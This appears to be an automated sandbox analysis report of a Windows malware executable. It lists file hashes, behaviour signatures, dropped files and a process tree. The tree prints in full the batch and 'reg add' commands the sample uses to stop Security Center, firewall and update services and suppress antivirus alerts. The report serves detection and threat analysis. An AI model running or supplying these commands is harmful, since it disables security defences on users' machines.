Analysis

  • max time kernel
    3s
  • max time network
    39s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/01/2024, 06:04

General

  • Target

    4015be0e49c809a29e861b509467854f.exe

  • Size

    4.3MB

  • MD5

    4015be0e49c809a29e861b509467854f

  • SHA1

    ae005b39667c0b51c329de64702e4852d0f89643

  • SHA256

    f3d9f86ad6edd9e597c39fc1542b81b1297e98d80148ca6e448dd3bdd08bf8b6

  • SHA512

    a3116d07109dfc5372b5c468ec2c8af2af0e5f77cb27d6c9a30acb611b371710df2426d8793bf98958a66ed9134ccca6f8be73f4b72adb77423ffc03767c8055

  • SSDEEP

    98304:Mmb0qw6nTOV1Q3BmBNt2wAILYeVk6ja3frHG:Dbu6nKV1QcNkI8fDG

Score
10/10

Malware Config

Signatures

  • Modifies security service 2 TTPs 3 IoCs
  • Windows security bypass 2 TTPs 5 IoCs
  • ACProtect 1.3x - 1.4x DLL software 1 IoCs

    Detects file using ACProtect software.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 1 IoCs
  • UPX packed file 14 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 40 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 64 IoCs
  • Runs net.exe
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4015be0e49c809a29e861b509467854f.exe
    "C:\Users\Admin\AppData\Local\Temp\4015be0e49c809a29e861b509467854f.exe"
    1⤵
    • Drops file in System32 directory
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4860
    • C:\Windows\SysWOW64\decomp.exe
      "C:\Windows\System32\decomp.exe" aosmtp.dll
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious use of SetWindowsHookEx
      PID:2852
    • C:\Windows\SysWOW64\Debugger\Bridge.exe
      C:\Windows\System32\Debugger\Bridge.exe
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2096
      • C:\Windows\SysWOW64\Debugger\Script.exe
        C:\Windows\SysWOW64\Debugger\Script.exe
        3⤵
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:4868
        • C:\Windows\SysWOW64\wscript.exe
          wscript.exe "C:\Windows\SysWOW64\Debugger\gizle.vbs"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:2396
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Windows\SysWOW64\Debugger\kill_xp_firewall.bat" "
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4628
            • C:\Windows\SysWOW64\net.exe
              net stop "Security Center"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1016
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop "Security Center"
                7⤵
                  PID:4048
              • C:\Windows\SysWOW64\net.exe
                net stop SharedAccess
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:1280
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop SharedAccess
                  7⤵
                    PID:4992
                • C:\Windows\SysWOW64\net.exe
                  net stop MpsSvc
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3980
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop MpsSvc
                    7⤵
                      PID:2692
                  • C:\Windows\SysWOW64\net.exe
                    net stop wscsvc
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2424
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop wscsvc
                      7⤵
                        PID:432
                    • C:\Windows\SysWOW64\reg.exe
                      reg add "HKLM\Software\Microsoft\Security Center" /v AntiVirusDisableNotify /t REG_DWORD /d 0x1 /f
                      6⤵
                      • Windows security bypass
                      PID:1540
                    • C:\Windows\SysWOW64\reg.exe
                      reg add "HKLM\Software\Microsoft\Security Center" /v FirewallDisableNotify /t REG_DWORD /d 0x1 /f
                      6⤵
                      • Windows security bypass
                      PID:4460
                    • C:\Windows\SysWOW64\reg.exe
                      reg add "HKLM\Software\Microsoft\Security Center" /v UpdatesDisableNotify /t REG_DWORD /d 0x1 /f
                      6⤵
                      • Windows security bypass
                      PID:1504
                    • C:\Windows\SysWOW64\reg.exe
                      reg add "HKLM\Software\Microsoft\Security Center" /v AntiVirusOverride /t REG_DWORD /d 0x1 /f
                      6⤵
                      • Windows security bypass
                      PID:1764
                    • C:\Windows\SysWOW64\reg.exe
                      reg add "HKLM\Software\Microsoft\Security Center" /v FirewallOverride /t REG_DWORD /d 0x1 /f
                      6⤵
                      • Windows security bypass
                      PID:2792
                    • C:\Windows\SysWOW64\reg.exe
                      reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess" /v Start /t REG_DWORD /d 0x4 /f
                      6⤵
                        PID:4408
                      • C:\Windows\SysWOW64\reg.exe
                        reg add "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /v Start /t REG_DWORD /d 0x4 /f
                        6⤵
                        • Modifies security service
                        PID:3600
                      • C:\Windows\SysWOW64\reg.exe
                        reg add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /t REG_DWORD /d 0x4 /f
                        6⤵
                        • Modifies security service
                        PID:3348
                      • C:\Windows\SysWOW64\reg.exe
                        reg add "HKLM\SYSTEM\CurrentControlSet\Services\wscntfy" /v Start /t REG_DWORD /d 0x4 /f
                        6⤵
                          PID:1372
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "HKLM\SYSTEM\CurrentControlSet\Services\MpsSvc" /v Start /t REG_DWORD /d 0x4 /f
                          6⤵
                          • Modifies security service
                          PID:4868
                  • C:\Windows\SysWOW64\Debugger\decomp.exe
                    "C:\Windows\SysWOW64\Debugger\decomp.exe" /all
                    3⤵
                    • Executes dropped EXE
                    • Drops file in System32 directory
                    • Suspicious use of SetWindowsHookEx
                    PID:1388
                  • C:\Windows\SysWOW64\Debugger\Attr.exe
                    "C:\Windows\SysWOW64\Debugger\Attr.exe" doit
                    3⤵
                    • Executes dropped EXE
                    • Drops file in System32 directory
                    • Suspicious use of SetWindowsHookEx
                    PID:4764
                  • C:\Windows\SysWOW64\regsvr32.exe
                    regsvr32.exe /s "C:\Windows\system32\aosmtp.dll"
                    3⤵
                    • Loads dropped DLL
                    • Modifies registry class
                    PID:4172
                  • C:\Users\Admin\AppData\Local\Temp\Fraps-VirtualDub_Full_Version!_www_wardom_org.exe
                    "C:\Users\Admin\AppData\Local\Temp\Fraps-VirtualDub_Full_Version!_www_wardom_org.exe"
                    3⤵
                      PID:3132
                • C:\Windows\SysWOW64\Debugger\ScreenCapture.exe
                  "C:\Windows\SysWOW64\Debugger\ScreenCapture.exe" 1
                  1⤵
                    PID:2120
                  • C:\Windows\SysWOW64\wscript.exe
                    wscript.exe C:\Windows\SysWOW64\Debugger\FirstUpdate.vbs
                    1⤵
                      PID:3136

                    Network

                    MITRE ATT&CK Enterprise v15

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Users\Admin\AppData\Local\Temp\Fraps-VirtualDub_Full_Version!_www_wardom_org.exe

                      Filesize

                      145KB

                      MD5

                      63c4362024249d63c2711c5d0ff01f69

                      SHA1

                      5145b9070f846c7c22cfbb4688c9c265ff8fbb85

                      SHA256

                      63e212bc681f4d8be423f7b44eb6245fc5aad99a2ba054bc275dc220105cccb8

                      SHA512

                      66e4cdeb82782079c001a24fbf1dac08795217b215fe243d6e1dca1de609135e5f526c44d90ea811e7f387bbb7e765552afec024fadcce346496197db963ca9b

                    • C:\Windows\SysWOW64\Debugger\Attr.exe

                      Filesize

                      47KB

                      MD5

                      2e794f47e668a0492578c5f368a0d9fd

                      SHA1

                      813144c0472b65d3d0be7915e41af5e82a0392f9

                      SHA256

                      81f83a00b4c6e97221ba1af6878044cffba8ab42ab126e717d6018287e473a6d

                      SHA512

                      084bfdc16d4c3b2aab6027f2b1cf24bbcc1b95afd2355001b03edd6358be925760aed0e90333f90cc99e494c570951688208b6c845475bfea155b711f5771b7e

                    • C:\Windows\SysWOW64\Debugger\Bridge.exe

                      Filesize

                      357KB

                      MD5

                      072dea68a8b4fe7c23e6d656a551abfe

                      SHA1

                      cb1769b6ecf7396a1ca74bc8da3f6adcef3ae85c

                      SHA256

                      f772ee4f00799150d0b13dd4361a6ca394f8f2c063a0150b32f0929749075632

                      SHA512

                      80c51178e8fca3aa08397ef5fb7ca4e69bd40327a4f922b2a0574dab48d86ba11ce89fcd4d48336846b6a28fbadfaa76d868dfabe83b35086ec75feda5343323

                    • C:\Windows\SysWOW64\Debugger\Extractor.exe

                      Filesize

                      52KB

                      MD5

                      0b1ce68e91c9ceb7226be8a25d4e0e10

                      SHA1

                      353bf215141f01c77256449fae49b124b62aabbe

                      SHA256

                      80cfb3787b9beca186ba717bbb25912d0d1b5acb1516bd5792e89400d47a02fc

                      SHA512

                      ba06d8ab35ea271575c2eef973a6fb45d3a9efe8b395343f444499e3280a7b21a028aa9926f78710215e368c9d49841a2bb85e59129b9f7ae522d4bf845dc80e

                    • C:\Windows\SysWOW64\Debugger\ScreenCapture.exe

                      Filesize

                      41KB

                      MD5

                      9440e2efdb570345f40440a694eb14c7

                      SHA1

                      ed51b0f0d402f73ecd67dd526261a8c038c0b2f0

                      SHA256

                      2509c65be9b478e23540e65db8c46989e02a26534c5f7d727bdd5461d42bb90b

                      SHA512

                      874ef724143f8d4702a464ee99362da0cb3b492f7df75f42f531a325b3104fde3a13c28d0d613ff00495c2581e3de183d2d03f68096ff510ff6bff8793fd01a7

                    • C:\Windows\SysWOW64\Debugger\Script.exe

                      Filesize

                      32KB

                      MD5

                      127d5346c33df3bc7eec0e97779b4098

                      SHA1

                      3c000c9c18fbcaf1cb17072766c5cd91e2320137

                      SHA256

                      3bbeae8d3b3e1e51ccc0a2a2d763adccfc4b470af168c125191de2f52a5d35dc

                      SHA512

                      751112dd4e64ce2d561f7976af5b034c5df1725c5330b10f932559f69c8f6a7b806cd65d001d897b4f9fe29efa939fb3811819d7d79edf757520dd57945c077d

                    • C:\Windows\SysWOW64\Debugger\config.dat

                      Filesize

                      466B

                      MD5

                      f3130450a126db253d485fa4d11aa3aa

                      SHA1

                      dd0d94f1230adac0e7ba5b72a2d6f8537ae85109

                      SHA256

                      d9b2a5e88e4720837091c78ed7800067a4f734381c9ad8725857646e4b2b259a

                      SHA512

                      2660e934be4db474d3da710a79c67e5875ad6abddceac438b0139bc011ccd28d71e18d0045e5caaa34f43c582ad5ffe2a35d86d158df21016e9d4c35bddffece

                    • C:\Windows\SysWOW64\Debugger\gizle.vbs

                      Filesize

                      186B

                      MD5

                      409f6c9929ff65bff4e518ddf2aaae2d

                      SHA1

                      b9433a61a120a5c4ad9cdfdd7b7342934fda89f0

                      SHA256

                      82203d31b6b9f6c650ec1d9fcedc076cd373a5e451b995d3c6185586ca4b61c8

                      SHA512

                      a2c72727c5e2430d42dfcb3c982a221d837efb0014adf35aeb0c93edc7b8d03c11a20837809b2d36c8d2aa1e0faac8bec762b8cd5abc912c3152b14fc467b066

                    • C:\Windows\SysWOW64\Debugger\kill_xp_firewall.bat

                      Filesize

                      1KB

                      MD5

                      8b84197072de5daed7e0b6d749752ff3

                      SHA1

                      1a09167829201ebeb1f2e19ba2e1176b9dd6579d

                      SHA256

                      bfff40cb8d72beedf40a5271c5406a21c9517fa5313854446e2015d505cca4d8

                      SHA512

                      4fd4410bfe5311a6721f7409a01c06eaea3401a28b948dfad0e7d4d39fa895e5d84281c736007113c5b4503eabc42f31ed1f360076c05ad6c305440e6d67f561

                    • C:\Windows\SysWOW64\Debugger\svchost.exe

                      Filesize

                      25KB

                      MD5

                      b2fa45c6280eed45f9da48667216fa12

                      SHA1

                      b1f3d5f9fd5a50918f00798d97a3a415a481e07e

                      SHA256

                      bfb3abf7bf33bb3416570bd749d10e02e3853eef5ee8b24423465c408f3255d8

                      SHA512

                      757eb1e5f666900398e3b12c565f3ac58c7f71634d9930612d832ef251e1c766160ff218b4c74d803b23cbb3a2ba064ed799aa5a966449bd09c07ecdc93c1279

                    • C:\Windows\SysWOW64\Debugger\temp.bind

                      Filesize

                      1024KB

                      MD5

                      b92153a5a9447ef9fac0368a8d0371e2

                      SHA1

                      684bce2dbe4ff8b965e9b6bfd323f48ed3ee1c00

                      SHA256

                      af3256c3d9d1a327362ed5ad60652635a9f356c2c5257ae23af6fc040da03556

                      SHA512

                      276ff5f2193a59b6c1362d8eacfb7bbed2f81628fc13617399fe9385b73007122fa65df4d6c86b2bf66e0f3c5de814578319a078b790304a2e325a80b2adc530

                    • C:\Windows\SysWOW64\aosmtp.dll

                      Filesize

                      125KB

                      MD5

                      2a20be5ec0a58b3a17900f336fdfa200

                      SHA1

                      caa8aa4367ead62a0aacc75de25e05bf162311a9

                      SHA256

                      52b3af25756ce8db7113d25a54a16d41c854e15c8a892b1f230aa1b5724ce5f7

                      SHA512

                      6bc1bd033f5cca09237aa19de0de5ac829529b6d83571bdbd46f851365f34ea2287bd3c52eb48e4fc3db0f777336c549f72de74c7b0ae9a4613579401e91ae60

                    • C:\Windows\SysWOW64\aosmtp.dll.mail

                      Filesize

                      127KB

                      MD5

                      d575cf885392f325c0b1ab4633528f99

                      SHA1

                      2ea3b7949b92137830c2fe6adca6ffc9872e7634

                      SHA256

                      326652b5ef8c9abfb21185a32ad274c8070cea2b51ae32950fdf9e045501b990

                      SHA512

                      a3b3483d740f61cbd061a56e14471ef693e3b739c1ef77dbae882c6f8969976a11f7207b819e6bb25deb736ff5fc26f3cc4cbb294fae2463e2fcfe2d336c74bd

                    • C:\Windows\SysWOW64\decomp.exe

                      Filesize

                      11KB

                      MD5

                      cdc7c8e80873bce728ce0d260a7d7ab5

                      SHA1

                      5c53b22475f69ae84acbffb25bb9fd3a6fcca56d

                      SHA256

                      e8d8e908adc80411e9c9b9bfb27fb1c44de8550e34f7943ce70efb2f565dc5c6

                      SHA512

                      102a3cfa80637a44b8322244a67503100915c83d27727e1616d890ed2cfc3d1c4f1c7973e817acad810e0fcf4e4f6f7ea16a85a8441752258f2e73360e232542

                    • memory/1388-99-0x0000000000400000-0x000000000040B000-memory.dmp

                      Filesize

                      44KB

                    • memory/2096-79-0x0000000003B00000-0x0000000003B01000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-94-0x00000000042B0000-0x00000000042B1000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-47-0x0000000003A50000-0x0000000003A51000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-52-0x0000000003A90000-0x0000000003A91000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-54-0x00000000020F0000-0x0000000002100000-memory.dmp

                      Filesize

                      64KB

                    • memory/2096-44-0x0000000002AB0000-0x0000000002AB1000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-55-0x00000000020F0000-0x0000000002100000-memory.dmp

                      Filesize

                      64KB

                    • memory/2096-57-0x00000000020F0000-0x0000000002100000-memory.dmp

                      Filesize

                      64KB

                    • memory/2096-58-0x00000000020F0000-0x0000000002100000-memory.dmp

                      Filesize

                      64KB

                    • memory/2096-59-0x00000000020F0000-0x0000000002100000-memory.dmp

                      Filesize

                      64KB

                    • memory/2096-46-0x0000000002A70000-0x0000000002A71000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-60-0x00000000020F0000-0x0000000002100000-memory.dmp

                      Filesize

                      64KB

                    • memory/2096-62-0x00000000020F0000-0x0000000002100000-memory.dmp

                      Filesize

                      64KB

                    • memory/2096-63-0x0000000002AF0000-0x0000000002AF1000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-65-0x0000000003AA0000-0x0000000003AA1000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-64-0x00000000020F0000-0x0000000002100000-memory.dmp

                      Filesize

                      64KB

                    • memory/2096-66-0x00000000005D0000-0x00000000005D1000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-70-0x0000000003A60000-0x0000000003A61000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-67-0x00000000005E0000-0x00000000005E1000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-72-0x0000000003AE0000-0x0000000003AE1000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-45-0x0000000002AE0000-0x0000000002AE1000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-73-0x0000000003AD0000-0x0000000003AD1000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-129-0x0000000004420000-0x0000000004421000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-80-0x0000000003AF0000-0x0000000003AF1000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-81-0x0000000003B20000-0x0000000003B21000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-43-0x0000000002AC0000-0x0000000002AC1000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-84-0x0000000004240000-0x0000000004241000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-82-0x0000000003B10000-0x0000000003B11000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-85-0x0000000003B30000-0x0000000003B31000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-86-0x0000000004260000-0x0000000004261000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-88-0x0000000004250000-0x0000000004251000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-89-0x0000000004280000-0x0000000004281000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-93-0x00000000042C0000-0x00000000042C1000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-49-0x0000000003A40000-0x0000000003A45000-memory.dmp

                      Filesize

                      20KB

                    • memory/2096-95-0x00000000042E0000-0x00000000042E1000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-92-0x0000000004270000-0x0000000004271000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-96-0x00000000042D0000-0x00000000042D1000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-97-0x0000000004300000-0x0000000004301000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-42-0x0000000002100000-0x0000000002101000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-41-0x0000000002110000-0x0000000002111000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-103-0x0000000004320000-0x0000000004321000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-101-0x00000000042F0000-0x00000000042F1000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-104-0x0000000004310000-0x0000000004311000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-105-0x0000000002BA0000-0x0000000002BA1000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-107-0x0000000004350000-0x0000000004351000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-40-0x0000000002AD0000-0x0000000002AD1000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-108-0x0000000004340000-0x0000000004341000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-39-0x0000000002A80000-0x0000000002A81000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-37-0x0000000002AA0000-0x0000000002AA1000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-35-0x0000000001FE0000-0x0000000002034000-memory.dmp

                      Filesize

                      336KB

                    • memory/2096-111-0x0000000004370000-0x0000000004371000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-117-0x00000000043B0000-0x00000000043B1000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-116-0x0000000004380000-0x0000000004381000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-112-0x0000000004360000-0x0000000004361000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-126-0x0000000004400000-0x0000000004401000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-120-0x00000000043D0000-0x00000000043D1000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-121-0x00000000043C0000-0x00000000043C1000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-122-0x00000000043F0000-0x00000000043F1000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-119-0x00000000043A0000-0x00000000043A1000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-123-0x00000000043E0000-0x00000000043E1000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-124-0x0000000004410000-0x0000000004411000-memory.dmp

                      Filesize

                      4KB

                    • memory/2096-33-0x0000000000400000-0x000000000045F000-memory.dmp

                      Filesize

                      380KB

                    • memory/2096-128-0x0000000004430000-0x0000000004431000-memory.dmp

                      Filesize

                      4KB

                    • memory/2120-409-0x0000000000400000-0x0000000000421000-memory.dmp

                      Filesize

                      132KB

                    • memory/2852-30-0x0000000000400000-0x000000000040B000-memory.dmp

                      Filesize

                      44KB

                    • memory/2852-24-0x0000000000400000-0x000000000040B000-memory.dmp

                      Filesize

                      44KB

                    • memory/4764-118-0x0000000000400000-0x000000000041B000-memory.dmp

                      Filesize

                      108KB

                    • memory/4868-76-0x0000000000400000-0x0000000000421000-memory.dmp

                      Filesize

                      132KB